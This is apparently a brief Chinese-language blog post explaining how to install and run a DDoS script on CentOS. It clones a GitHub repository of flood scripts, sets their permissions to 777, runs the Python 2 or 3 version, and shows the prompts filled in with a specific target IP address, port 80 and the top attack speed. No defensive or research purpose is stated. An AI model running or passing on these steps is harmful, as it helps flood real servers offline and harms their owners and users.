Centos安装DDoS脚本

950 阅读1分钟

下载ddos

git clone https://github.com/Andysun06/ddos

DDOS 赋权

cd ddos
chmod 777 ddos-p2.py ddos-p3.py

执行脚本

#kali执行p3
python ddos-p3.py
#centos执行p2
python ddos-p2.py

输入服务器地址ip

Input IP     : 23.224.42.59
Attack port  : 80
Attack speed(1~1000) : 1000